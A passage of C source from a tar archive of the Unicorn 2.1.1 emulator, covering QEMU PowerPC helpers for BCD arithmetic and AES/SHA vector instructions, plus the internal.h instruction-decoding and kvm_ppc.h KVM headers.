(b->VsrSD(0) < 0) { lo_value = -b->VsrSD(1); hi_value = ~b->VsrD(0) + !lo_value; bcd_put_digit(&ret, 0xD, 0); } else { lo_value = b->VsrD(1); hi_value = b->VsrD(0); bcd_put_digit(&ret, bcd_preferred_sgn(0, ps), 0); } if (divu128(&lo_value, &hi_value, 1000000000000000ULL) || lo_value > 9999999999999999ULL) { cr = CRF_SO; } for (i = 1; i < 16; hi_value /= 10, i++) { bcd_put_digit(&ret, hi_value % 10, i); } for (; i < 32; lo_value /= 10, i++) { bcd_put_digit(&ret, lo_value % 10, i); } cr |= bcd_cmp_zero(&ret); *r = ret; return cr; } uint32_t helper_bcdctsq(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { uint8_t i; int cr; uint64_t carry; uint64_t unused; uint64_t lo_value; uint64_t hi_value = 0; int sgnb = bcd_get_sgn(b); int invalid = (sgnb == 0); lo_value = bcd_get_digit(b, 31, &invalid); for (i = 30; i > 0; i--) { mulu64(&lo_value, &carry, lo_value, 10ULL); mulu64(&hi_value, &unused, hi_value, 10ULL); lo_value += bcd_get_digit(b, i, &invalid); hi_value += carry; if (unlikely(invalid)) { break; } } if (sgnb == -1) { #ifdef _MSC_VER r->VsrSD(1) = 0 - lo_value; #else r->VsrSD(1) = -lo_value; #endif r->VsrSD(0) = ~hi_value + !r->VsrSD(1); } else { r->VsrSD(1) = lo_value; r->VsrSD(0) = hi_value; } cr = bcd_cmp_zero(b); if (unlikely(invalid)) { cr = CRF_SO; } return cr; } uint32_t helper_bcdcpsgn(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int i; int invalid = 0; if (bcd_get_sgn(a) == 0 || bcd_get_sgn(b) == 0) { return CRF_SO; } *r = *a; bcd_put_digit(r, b->VsrB(BCD_DIG_BYTE(0)) & 0xF, 0); for (i = 1; i < 32; i++) { bcd_get_digit(a, i, &invalid); bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } return bcd_cmp_zero(r); } uint32_t helper_bcdsetsgn(ppc_avr_t *r, ppc_avr_t *b, uint32_t ps) { int sgnb = bcd_get_sgn(b); *r = *b; bcd_put_digit(r, bcd_preferred_sgn(sgnb, ps), 0); if (bcd_is_valid(b) == false) { return CRF_SO; } return bcd_cmp_zero(r); } uint32_t helper_bcds(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int i = a->VsrSB(7); bool ox_flag = false; int sgnb = bcd_get_sgn(b); ppc_avr_t ret = *b; ret.VsrD(1) &= ~0xf; if (bcd_is_valid(b) == false) { return CRF_SO; } if (unlikely(i > 31)) { i = 31; } else if (unlikely(i < -31)) { i = -31; } if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); } bcd_put_digit(&ret, bcd_preferred_sgn(sgnb, ps), 0); *r = ret; cr = bcd_cmp_zero(r); if (ox_flag) { cr |= CRF_SO; } return cr; } uint32_t helper_bcdus(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int i; int invalid = 0; bool ox_flag = false; ppc_avr_t ret = *b; for (i = 0; i < 32; i++) { bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } i = a->VsrSB(7); if (i >= 32) { ox_flag = true; ret.VsrD(1) = ret.VsrD(0) = 0; } else if (i <= -32) { ret.VsrD(1) = ret.VsrD(0) = 0; } else if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); } *r = ret; cr = bcd_cmp_zero(r); if (ox_flag) { cr |= CRF_SO; } return cr; } uint32_t helper_bcdsr(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int cr; int unused = 0; int invalid = 0; bool ox_flag = false; int sgnb = bcd_get_sgn(b); ppc_avr_t ret = *b; ret.VsrD(1) &= ~0xf; int i = a->VsrSB(7); ppc_avr_t bcd_one; bcd_one.VsrD(0) = 0; bcd_one.VsrD(1) = 0x10; if (bcd_is_valid(b) == false) { return CRF_SO; } if (unlikely(i > 31)) { i = 31; } else if (unlikely(i < -31)) { i = -31; } if (i > 0) { ulshift(&ret.VsrD(1), &ret.VsrD(0), i * 4, &ox_flag); } else { urshift(&ret.VsrD(1), &ret.VsrD(0), -i * 4); if (bcd_get_digit(&ret, 0, &invalid) >= 5) { bcd_add_mag(&ret, &ret, &bcd_one, &invalid, &unused); } } bcd_put_digit(&ret, bcd_preferred_sgn(sgnb, ps), 0); cr = bcd_cmp_zero(&ret); if (ox_flag) { cr |= CRF_SO; } *r = ret; return cr; } uint32_t helper_bcdtrunc(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { uint64_t mask; uint32_t ox_flag = 0; int i = a->VsrSH(3) + 1; ppc_avr_t ret = *b; if (bcd_is_valid(b) == false) { return CRF_SO; } if (i > 16 && i < 32) { mask = (uint64_t)-1 >> (128 - i * 4); if (ret.VsrD(0) & ~mask) { ox_flag = CRF_SO; } ret.VsrD(0) &= mask; } else if (i >= 0 && i <= 16) { mask = (uint64_t)-1 >> (64 - i * 4); if (ret.VsrD(0) || (ret.VsrD(1) & ~mask)) { ox_flag = CRF_SO; } ret.VsrD(1) &= mask; ret.VsrD(0) = 0; } bcd_put_digit(&ret, bcd_preferred_sgn(bcd_get_sgn(b), ps), 0); *r = ret; return bcd_cmp_zero(&ret) | ox_flag; } uint32_t helper_bcdutrunc(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, uint32_t ps) { int i; uint64_t mask; uint32_t ox_flag = 0; int invalid = 0; ppc_avr_t ret = *b; for (i = 0; i < 32; i++) { bcd_get_digit(b, i, &invalid); if (unlikely(invalid)) { return CRF_SO; } } i = a->VsrSH(3); if (i > 16 && i < 33) { mask = (uint64_t)-1 >> (128 - i * 4); if (ret.VsrD(0) & ~mask) { ox_flag = CRF_SO; } ret.VsrD(0) &= mask; } else if (i > 0 && i <= 16) { mask = (uint64_t)-1 >> (64 - i * 4); if (ret.VsrD(0) || (ret.VsrD(1) & ~mask)) { ox_flag = CRF_SO; } ret.VsrD(1) &= mask; ret.VsrD(0) = 0; } else if (i == 0) { if (ret.VsrD(0) || ret.VsrD(1)) { ox_flag = CRF_SO; } ret.VsrD(0) = ret.VsrD(1) = 0; } *r = ret; if (r->VsrD(0) == 0 && r->VsrD(1) == 0) { return ox_flag | CRF_EQ; } return ox_flag | CRF_GT; } void helper_vsbox(ppc_avr_t *r, ppc_avr_t *a) { int i; VECTOR_FOR_INORDER_I(i, u8) { r->u8[i] = AES_sbox[a->u8[i]]; } } void helper_vcipher(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u32) { result.VsrW(i) = b->VsrW(i) ^ (AES_Te0[a->VsrB(AES_shifts[4 * i + 0])] ^ AES_Te1[a->VsrB(AES_shifts[4 * i + 1])] ^ AES_Te2[a->VsrB(AES_shifts[4 * i + 2])] ^ AES_Te3[a->VsrB(AES_shifts[4 * i + 3])]); } *r = result; } void helper_vcipherlast(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u8) { result.VsrB(i) = b->VsrB(i) ^ (AES_sbox[a->VsrB(AES_shifts[i])]); } *r = result; } void helper_vncipher(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { /* This differs from what is written in ISA V2.07. The RTL is */ /* incorrect and will be fixed in V2.07B. */ int i; ppc_avr_t tmp; VECTOR_FOR_INORDER_I(i, u8) { tmp.VsrB(i) = b->VsrB(i) ^ AES_isbox[a->VsrB(AES_ishifts[i])]; } VECTOR_FOR_INORDER_I(i, u32) { r->VsrW(i) = AES_imc[tmp.VsrB(4 * i + 0)][0] ^ AES_imc[tmp.VsrB(4 * i + 1)][1] ^ AES_imc[tmp.VsrB(4 * i + 2)][2] ^ AES_imc[tmp.VsrB(4 * i + 3)][3]; } } void helper_vncipherlast(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b) { ppc_avr_t result; int i; VECTOR_FOR_INORDER_I(i, u8) { result.VsrB(i) = b->VsrB(i) ^ (AES_isbox[a->VsrB(AES_ishifts[i])]); } *r = result; } void helper_vshasigmaw(ppc_avr_t *r, ppc_avr_t *a, uint32_t st_six) { int st = (st_six & 0x10) != 0; int six = st_six & 0xF; int i; for (i = 0; i < ARRAY_SIZE(r->u32); i++) { if (st == 0) { if ((six & (0x8 >> i)) == 0) { r->VsrW(i) = ror32(a->VsrW(i), 7) ^ ror32(a->VsrW(i), 18) ^ (a->VsrW(i) >> 3); } else { /* six.bit[i] == 1 */ r->VsrW(i) = ror32(a->VsrW(i), 17) ^ ror32(a->VsrW(i), 19) ^ (a->VsrW(i) >> 10); } } else { /* st == 1 */ if ((six & (0x8 >> i)) == 0) { r->VsrW(i) = ror32(a->VsrW(i), 2) ^ ror32(a->VsrW(i), 13) ^ ror32(a->VsrW(i), 22); } else { /* six.bit[i] == 1 */ r->VsrW(i) = ror32(a->VsrW(i), 6) ^ ror32(a->VsrW(i), 11) ^ ror32(a->VsrW(i), 25); } } } } void helper_vshasigmad(ppc_avr_t *r, ppc_avr_t *a, uint32_t st_six) { int st = (st_six & 0x10) != 0; int six = st_six & 0xF; int i; for (i = 0; i < ARRAY_SIZE(r->u64); i++) { if (st == 0) { if ((six & (0x8 >> (2 * i))) == 0) { r->VsrD(i) = ror64(a->VsrD(i), 1) ^ ror64(a->VsrD(i), 8) ^ (a->VsrD(i) >> 7); } else { /* six.bit[2*i] == 1 */ r->VsrD(i) = ror64(a->VsrD(i), 19) ^ ror64(a->VsrD(i), 61) ^ (a->VsrD(i) >> 6); } } else { /* st == 1 */ if ((six & (0x8 >> (2 * i))) == 0) { r->VsrD(i) = ror64(a->VsrD(i), 28) ^ ror64(a->VsrD(i), 34) ^ ror64(a->VsrD(i), 39); } else { /* six.bit[2*i] == 1 */ r->VsrD(i) = ror64(a->VsrD(i), 14) ^ ror64(a->VsrD(i), 18) ^ ror64(a->VsrD(i), 41); } } } } void helper_vpermxor(ppc_avr_t *r, ppc_avr_t *a, ppc_avr_t *b, ppc_avr_t *c) { ppc_avr_t result; int i; for (i = 0; i < ARRAY_SIZE(r->u8); i++) { int indexA = c->VsrB(i) >> 4; int indexB = c->VsrB(i) & 0xF; result.VsrB(i) = a->VsrB(indexA) ^ b->VsrB(indexB); } *r = result; } #undef VECTOR_FOR_INORDER_I /*****************************************************************************/ /* SPE extension helpers */ /* Use a table to make this quicker */ static const uint8_t hbrev[16] = { 0x0, 0x8, 0x4, 0xC, 0x2, 0xA, 0x6, 0xE, 0x1, 0x9, 0x5, 0xD, 0x3, 0xB, 0x7, 0xF, }; static inline uint8_t byte_reverse(uint8_t val) { return hbrev[val >> 4] | (hbrev[val & 0xF] << 4); } static inline uint32_t word_reverse(uint32_t val) { return byte_reverse(val >> 24) | (byte_reverse(val >> 16) << 8) | (byte_reverse(val >> 8) << 16) | (byte_reverse(val) << 24); } #define MASKBITS 16 /* Random value - to be fixed (implementation dependent) */ target_ulong helper_brinc(target_ulong arg1, target_ulong arg2) { uint32_t a, b, d, mask; mask = UINT32_MAX >> (32 - MASKBITS); a = arg1 & mask; b = arg2 & mask; d = word_reverse(1 + word_reverse(a | ~b)); return (arg1 & ~mask) | (d & b); } uint32_t helper_cntlsw32(uint32_t val) { if (val & 0x80000000) { return clz32(~val); } else { return clz32(val); } } uint32_t helper_cntlzw32(uint32_t val) { return clz32(val); } /* 440 specific */ target_ulong helper_dlmzb(CPUPPCState *env, target_ulong high, target_ulong low, uint32_t update_Rc) { target_ulong mask; int i; i = 1; for (mask = 0xFF000000; mask != 0; mask = mask >> 8) { if ((high & mask) == 0) { if (update_Rc) { env->crf[0] = 0x4; } goto done; } i++; } for (mask = 0xFF000000; mask != 0; mask = mask >> 8) { if ((low & mask) == 0) { if (update_Rc) { env->crf[0] = 0x8; } goto done; } i++; } i = 8; if (update_Rc) { env->crf[0] = 0x2; } done: env->xer = (env->xer & ~0x7F) | i; if (update_Rc) { env->crf[0] |= xer_so; } return i; } ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/internal.h������������������������������������������������������������0000664�0000000�0000000�00000017362�14675241067�0020221�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * PowerPC interal definitions for qemu. * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #ifndef PPC_INTERNAL_H #define PPC_INTERNAL_H #define FUNC_MASK(name, ret_type, size, max_val) \ static inline ret_type name(uint##size##_t start, \ uint##size##_t end) \ { \ ret_type ret, max_bit = size - 1; \ \ if (likely(start == 0)) { \ ret = max_val << (max_bit - end); \ } else if (likely(end == max_bit)) { \ ret = max_val >> start; \ } else { \ ret = (((uint##size##_t)(0ULL - 1ULL)) >> (start)) ^ \ (((uint##size##_t)(0ULL - 1ULL) >> (end)) >> 1); \ if (unlikely(start > end)) { \ return ~ret; \ } \ } \ \ return ret; \ } #if defined(TARGET_PPC64) FUNC_MASK(MASK, target_ulong, 64, UINT64_MAX); #else FUNC_MASK(MASK, target_ulong, 32, UINT32_MAX); #endif FUNC_MASK(mask_u32, uint32_t, 32, UINT32_MAX); FUNC_MASK(mask_u64, uint64_t, 64, UINT64_MAX); /*****************************************************************************/ /*** Instruction decoding ***/ #define EXTRACT_HELPER(name, shift, nb) \ static inline uint32_t name(uint32_t opcode) \ { \ return extract32(opcode, shift, nb); \ } #define EXTRACT_SHELPER(name, shift, nb) \ static inline int32_t name(uint32_t opcode) \ { \ return sextract32(opcode, shift, nb); \ } #define EXTRACT_HELPER_SPLIT(name, shift1, nb1, shift2, nb2) \ static inline uint32_t name(uint32_t opcode) \ { \ return extract32(opcode, shift1, nb1) << nb2 | \ extract32(opcode, shift2, nb2); \ } #define EXTRACT_HELPER_SPLIT_3(name, \ d0_bits, shift_op_d0, shift_d0, \ d1_bits, shift_op_d1, shift_d1, \ d2_bits, shift_op_d2, shift_d2) \ static inline int16_t name(uint32_t opcode) \ { \ return \ (((opcode >> (shift_op_d0)) & ((1 << (d0_bits)) - 1)) << (shift_d0)) | \ (((opcode >> (shift_op_d1)) & ((1 << (d1_bits)) - 1)) << (shift_d1)) | \ (((opcode >> (shift_op_d2)) & ((1 << (d2_bits)) - 1)) << (shift_d2)); \ } /* Opcode part 1 */ EXTRACT_HELPER(opc1, 26, 6); /* Opcode part 2 */ EXTRACT_HELPER(opc2, 1, 5); /* Opcode part 3 */ EXTRACT_HELPER(opc3, 6, 5); /* Opcode part 4 */ EXTRACT_HELPER(opc4, 16, 5); /* Update Cr0 flags */ EXTRACT_HELPER(Rc, 0, 1); /* Update Cr6 flags (Altivec) */ EXTRACT_HELPER(Rc21, 10, 1); /* Destination */ EXTRACT_HELPER(rD, 21, 5); /* Source */ EXTRACT_HELPER(rS, 21, 5); /* First operand */ EXTRACT_HELPER(rA, 16, 5); /* Second operand */ EXTRACT_HELPER(rB, 11, 5); /* Third operand */ EXTRACT_HELPER(rC, 6, 5); /*** Get CRn ***/ EXTRACT_HELPER(crfD, 23, 3); EXTRACT_HELPER(BF, 23, 3); EXTRACT_HELPER(crfS, 18, 3); EXTRACT_HELPER(crbD, 21, 5); EXTRACT_HELPER(crbA, 16, 5); EXTRACT_HELPER(crbB, 11, 5); /* SPR / TBL */ EXTRACT_HELPER(_SPR, 11, 10); static inline uint32_t SPR(uint32_t opcode) { uint32_t sprn = _SPR(opcode); return ((sprn >> 5) & 0x1F) | ((sprn & 0x1F) << 5); } /*** Get constants ***/ /* 16 bits signed immediate value */ EXTRACT_SHELPER(SIMM, 0, 16); /* 16 bits unsigned immediate value */ EXTRACT_HELPER(UIMM, 0, 16); /* 5 bits signed immediate value */ EXTRACT_SHELPER(SIMM5, 16, 5); /* 5 bits signed immediate value */ EXTRACT_HELPER(UIMM5, 16, 5); /* 4 bits unsigned immediate value */ EXTRACT_HELPER(UIMM4, 16, 4); /* Bit count */ EXTRACT_HELPER(NB, 11, 5); /* Shift count */ EXTRACT_HELPER(SH, 11, 5); /* lwat/stwat/ldat/lwat */ EXTRACT_HELPER(FC, 11, 5); /* Vector shift count */ EXTRACT_HELPER(VSH, 6, 4); /* Mask start */ EXTRACT_HELPER(MB, 6, 5); /* Mask end */ EXTRACT_HELPER(ME, 1, 5); /* Trap operand */ EXTRACT_HELPER(TO, 21, 5); EXTRACT_HELPER(CRM, 12, 8); EXTRACT_HELPER(SR, 16, 4); /* mtfsf/mtfsfi */ EXTRACT_HELPER(FPBF, 23, 3); EXTRACT_HELPER(FPIMM, 12, 4); EXTRACT_HELPER(FPL, 25, 1); EXTRACT_HELPER(FPFLM, 17, 8); EXTRACT_HELPER(FPW, 16, 1); /* mffscrni */ EXTRACT_HELPER(RM, 11, 2); /* addpcis */ EXTRACT_HELPER_SPLIT_3(DX, 10, 6, 6, 5, 16, 1, 1, 0, 0) #if defined(TARGET_PPC64) /* darn */ EXTRACT_HELPER(L, 16, 2); #endif /*** Jump target decoding ***/ /* Immediate address */ static inline target_ulong LI(uint32_t opcode) { return (opcode >> 0) & 0x03FFFFFC; } static inline uint32_t BD(uint32_t opcode) { return (opcode >> 0) & 0xFFFC; } EXTRACT_HELPER(BO, 21, 5); EXTRACT_HELPER(BI, 16, 5); /* Absolute/relative address */ EXTRACT_HELPER(AA, 1, 1); /* Link */ EXTRACT_HELPER(LK, 0, 1); /* DFP Z22-form */ EXTRACT_HELPER(DCM, 10, 6) /* DFP Z23-form */ EXTRACT_HELPER(RMC, 9, 2) EXTRACT_HELPER(Rrm, 16, 1) EXTRACT_HELPER_SPLIT(DQxT, 3, 1, 21, 5); EXTRACT_HELPER_SPLIT(xT, 0, 1, 21, 5); EXTRACT_HELPER_SPLIT(xS, 0, 1, 21, 5); EXTRACT_HELPER_SPLIT(xA, 2, 1, 16, 5); EXTRACT_HELPER_SPLIT(xB, 1, 1, 11, 5); EXTRACT_HELPER_SPLIT(xC, 3, 1, 6, 5); EXTRACT_HELPER(DM, 8, 2); EXTRACT_HELPER(UIM, 16, 2); EXTRACT_HELPER(SHW, 8, 2); EXTRACT_HELPER(SP, 19, 2); EXTRACT_HELPER(IMM8, 11, 8); EXTRACT_HELPER(DCMX, 16, 7); EXTRACT_HELPER_SPLIT_3(DCMX_XV, 5, 16, 0, 1, 2, 5, 1, 6, 6); void helper_compute_fprf_float16(CPUPPCState *env, float16 arg); void helper_compute_fprf_float32(CPUPPCState *env, float32 arg); void helper_compute_fprf_float128(CPUPPCState *env, float128 arg); /* Raise a data fault alignment exception for the specified virtual address */ void ppc_cpu_do_unaligned_access(CPUState *cs, vaddr addr, MMUAccessType access_type, int mmu_idx, uintptr_t retaddr); #endif /* PPC_INTERNAL_H */ ������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/ppc/kvm_ppc.h�������������������������������������������������������������0000664�0000000�0000000�00000025100�14675241067�0020031�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * Copyright 2008 IBM Corporation. * Authors: Hollis Blanchard <hollisb@us.ibm.com> * * This work is licensed under the GNU GPL license version 2 or later. * */ #ifndef KVM_PPC_H #define KVM_PPC_H #define TYPE_HOST_POWERPC_CPU POWERPC_CPU_TYPE_NAME("host") #ifdef CONFIG_KVM uint32_t kvmppc_get_tbfreq(void); uint64_t kvmppc_get_clockfreq(void); bool kvmppc_get_host_model(char **buf); bool kvmppc_get_host_serial(char **buf); int kvmppc_get_hasidle(CPUPPCState *env); int kvmppc_get_hypercall(CPUPPCState *env, uint8_t *buf, int buf_len); int kvmppc_set_interrupt(PowerPCCPU *cpu, int irq, int level); void kvmppc_enable_logical_ci_hcalls(void); void kvmppc_enable_set_mode_hcall(void); void kvmppc_enable_clear_ref_mod_hcalls(void); void kvmppc_enable_h_page_init(void); void kvmppc_set_papr(PowerPCCPU *cpu); int kvmppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr); void kvmppc_set_mpic_proxy(PowerPCCPU *cpu, int mpic_proxy); bool kvmppc_get_fwnmi(void); int kvmppc_set_fwnmi(void); int kvmppc_smt_threads(void); void kvmppc_error_append_smt_possible_hint(Error *const *errp); int kvmppc_set_smt_threads(int smt); int kvmppc_clear_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits); int kvmppc_or_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits); int kvmppc_set_tcr(PowerPCCPU *cpu); int kvmppc_booke_watchdog_enable(PowerPCCPU *cpu); target_ulong kvmppc_configure_v3_mmu(PowerPCCPU *cpu, bool radix, bool gtse, uint64_t proc_tbl); void kvmppc_svm_off(Error **errp); bool kvmppc_spapr_use_multitce(void); int kvmppc_spapr_enable_inkernel_multitce(void); void *kvmppc_create_spapr_tce(uint32_t liobn, uint32_t page_shift, uint64_t bus_offset, uint32_t nb_table, int *pfd, bool need_vfio); int kvmppc_remove_spapr_tce(void *table, int pfd, uint32_t window_size); int kvmppc_reset_htab(int shift_hint); uint64_t kvmppc_vrma_limit(unsigned int hash_shift); bool kvmppc_has_cap_spapr_vfio(void); bool kvmppc_has_cap_epr(void); int kvmppc_define_rtas_kernel_token(uint32_t token, const char *function); int kvmppc_get_htab_fd(bool write, uint64_t index, Error **errp); int kvmppc_save_htab(QEMUFile *f, int fd, size_t bufsize, int64_t max_ns); int kvmppc_load_htab_chunk(QEMUFile *f, int fd, uint32_t index, uint16_t n_valid, uint16_t n_invalid); void kvmppc_read_hptes(ppc_hash_pte64_t *hptes, hwaddr ptex, int n); void kvmppc_write_hpte(hwaddr ptex, uint64_t pte0, uint64_t pte1); bool kvmppc_has_cap_fixup_hcalls(void); bool kvmppc_has_cap_htm(void); bool kvmppc_has_cap_mmu_radix(void); bool kvmppc_has_cap_mmu_hash_v3(void); bool kvmppc_has_cap_xive(void); int kvmppc_get_cap_safe_cache(void); int kvmppc_get_cap_safe_bounds_check(void); int kvmppc_get_cap_safe_indirect_branch(void); int kvmppc_get_cap_count_cache_flush_assist(void); bool kvmppc_has_cap_nested_kvm_hv(void); int kvmppc_set_cap_nested_kvm_hv(int enable); int kvmppc_get_cap_large_decr(void); int kvmppc_enable_cap_large_decr(PowerPCCPU *cpu, int enable); int kvmppc_enable_hwrng(void); int kvmppc_put_books_sregs(PowerPCCPU *cpu); PowerPCCPUClass *kvm_ppc_get_host_cpu_class(void); void kvmppc_check_papr_resize_hpt(Error **errp); int kvmppc_resize_hpt_prepare(PowerPCCPU *cpu, target_ulong flags, int shift); int kvmppc_resize_hpt_commit(PowerPCCPU *cpu, target_ulong flags, int shift); bool kvmppc_pvr_workaround_required(PowerPCCPU *cpu); bool kvmppc_hpt_needs_host_contiguous_pages(void); void kvm_check_mmu(PowerPCCPU *cpu, Error **errp); void kvmppc_set_reg_ppc_online(PowerPCCPU *cpu, unsigned int online); void kvmppc_set_reg_tb_offset(PowerPCCPU *cpu, int64_t tb_offset); int kvm_handle_nmi(PowerPCCPU *cpu, struct kvm_run *run); #else static inline uint32_t kvmppc_get_tbfreq(void) { return 0; } static inline bool kvmppc_get_host_model(char **buf) { return false; } static inline bool kvmppc_get_host_serial(char **buf) { return false; } static inline uint64_t kvmppc_get_clockfreq(void) { return 0; } static inline uint32_t kvmppc_get_vmx(void) { return 0; } static inline uint32_t kvmppc_get_dfp(void) { return 0; } static inline int kvmppc_get_hasidle(CPUPPCState *env) { return 0; } static inline int kvmppc_get_hypercall(CPUPPCState *env, uint8_t *buf, int buf_len) { return -1; } static inline int kvmppc_set_interrupt(PowerPCCPU *cpu, int irq, int level) { return -1; } static inline void kvmppc_enable_logical_ci_hcalls(void) { } static inline void kvmppc_enable_set_mode_hcall(void) { } static inline void kvmppc_enable_clear_ref_mod_hcalls(void) { } static inline void kvmppc_enable_h_page_init(void) { } static inline void kvmppc_set_papr(PowerPCCPU *cpu) { } static inline int kvmppc_set_compat(PowerPCCPU *cpu, uint32_t compat_pvr) { return 0; } static inline void kvmppc_set_mpic_proxy(PowerPCCPU *cpu, int mpic_proxy) { } static inline bool kvmppc_get_fwnmi(void) { return false; } static inline int kvmppc_set_fwnmi(void) { return -1; } static inline int kvmppc_smt_threads(void) { return 1; } static inline void kvmppc_error_append_smt_possible_hint(Error *const *errp) { return; } static inline int kvmppc_set_smt_threads(int smt) { return 0; } static inline int kvmppc_or_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits) { return 0; } static inline int kvmppc_clear_tsr_bits(PowerPCCPU *cpu, uint32_t tsr_bits) { return 0; } static inline int kvmppc_set_tcr(PowerPCCPU *cpu) { return 0; } static inline int kvmppc_booke_watchdog_enable(PowerPCCPU *cpu) { return -1; } static inline target_ulong kvmppc_configure_v3_mmu(PowerPCCPU *cpu, bool radix, bool gtse, uint64_t proc_tbl) { return 0; } static inline void kvmppc_svm_off(Error **errp) { return; } static inline void kvmppc_set_reg_ppc_online(PowerPCCPU *cpu, unsigned int online) { return; } static inline void kvmppc_set_reg_tb_offset(PowerPCCPU *cpu, int64_t tb_offset) { } static inline bool kvmppc_spapr_use_multitce(void) { return false; } static inline int kvmppc_spapr_enable_inkernel_multitce(void) { return -1; } static inline void *kvmppc_create_spapr_tce(uint32_t liobn, uint32_t page_shift, uint64_t bus_offset, uint32_t nb_table, int *pfd, bool need_vfio) { return NULL; } static inline int kvmppc_remove_spapr_tce(void *table, int pfd, uint32_t nb_table) { return -1; } static inline int kvmppc_reset_htab(int shift_hint) { return 0; } static inline uint64_t kvmppc_vrma_limit(unsigned int hash_shift) { g_assert_not_reached(); } static inline bool kvmppc_hpt_needs_host_contiguous_pages(void) { return false; } static inline void kvm_check_mmu(PowerPCCPU *cpu, Error **errp) { } static inline bool kvmppc_has_cap_spapr_vfio(void) { return false; } static inline bool kvmppc_has_cap_epr(void) { return false; } static inline int kvmppc_define_rtas_kernel_token(uint32_t token, const char *function) { return -1; } static inline int kvmppc_get_htab_fd(bool write, uint64_t index, Error **errp) { return -1; } static inline int kvmppc_save_htab(QEMUFile *f, int fd, size_t bufsize, int64_t max_ns) { abort(); } static inline int kvmppc_load_htab_chunk(QEMUFile *f, int fd, uint32_t index, uint16_t n_valid, uint16_t n_invalid) { abort(); } static inline void kvmppc_read_hptes(ppc_hash_pte64_t *hptes, hwaddr ptex, int n) { abort(); } static inline void kvmppc_write_hpte(hwaddr ptex, uint64_t pte0, uint64_t pte1) { abort(); } static inline bool kvmppc_has_cap_fixup_hcalls(void) { abort(); } static inline bool kvmppc_has_cap_htm(void) { return false; } static inline bool kvmppc_has_cap_mmu_radix(void) { return false; } static inline bool kvmppc_has_cap_mmu_hash_v3(void) { return false; } static inline bool kvmppc_has_cap_xive(void) { return false; } static inline int kvmppc_get_cap_safe_cache(void) { return 0; } static inline int kvmppc_get_cap_safe_bounds_check(void) { return 0; } static inline int kvmppc_get_cap_safe_indirect_branch(void) { return 0; } static inline int kvmppc_get_cap_count_cache_flush_assist(void) { return 0; } static inline bool kvmppc_has_cap_nested_kvm_hv(void) { return false; } static inline int kvmppc_set_cap_nested_kvm_hv(int enable) { return -1; } static inline int kvmppc_get_cap_large_decr(void) { return 0; } static inline int kvmppc_enable_cap_large_decr(PowerPCCPU *cpu, int enable) { return -1; } static inline int kvmppc_enable_hwrng(void) { return -1; } static inline int kvmppc_put_books_sregs(PowerPCCPU *cpu) { abort(); } static inline PowerPCCPUClass *kvm_ppc_get_host_cpu_class(void) { return NULL; } static inline void kvmppc_check_papr_resize_hpt(Error **errp) { return; } static inline int kvmppc_resize_hpt_prepare(PowerPCCPU *cpu, target_ulong flags, int shift) { return -ENOSYS; } static inline int kvmppc_resize_hpt_commit(PowerPCCPU *cpu, target_ulong flags, int shift) { return -ENOSYS; } static inline bool kvmppc_pvr_workaround_required(PowerPCCPU *cpu) { return false; } #endif #ifndef CONFIG_KVM #define kvmppc_eieio() do { } while (0) static inline void kvmppc_dcbst_range(PowerPCCPU *cpu, uint8_t *addr, int len) { } static inline void kvmppc_icbi_range(PowerPCCPU *cpu, uint8_t *addr, int len) { } #else /* CONFIG_KVM */ #define kvmppc_eieio() \ do { \ if (kvm_enabled()) { \ asm volatile("eieio" : : : "memory"); \ } \ } while (0) /* Store data cache blocks back to memory */ static inline void kvmppc_dcbst_range(PowerPCCPU *cpu, uint8_t *addr, int len) { uint8_t *p; for (p = addr; p < addr + len; p += cpu->env.dcache_line_size) { asm volatile("dcbst 0,%0" : : "r"(p) : "memory"); } } /* Invalidate instruction cache blocks */ static inline void kvmppc_icbi_range(PowerPCCPU *cpu, uint8_t *addr, int len) { uint8_t *p; for (p = addr; p < addr + len; p += cpu->env.icache_line_size) { asm volatile("icbi 0,%0" : : "r"(p)); } } #endif /* CONFIG_KVM */ #endif /* KVM_PPC_H */ 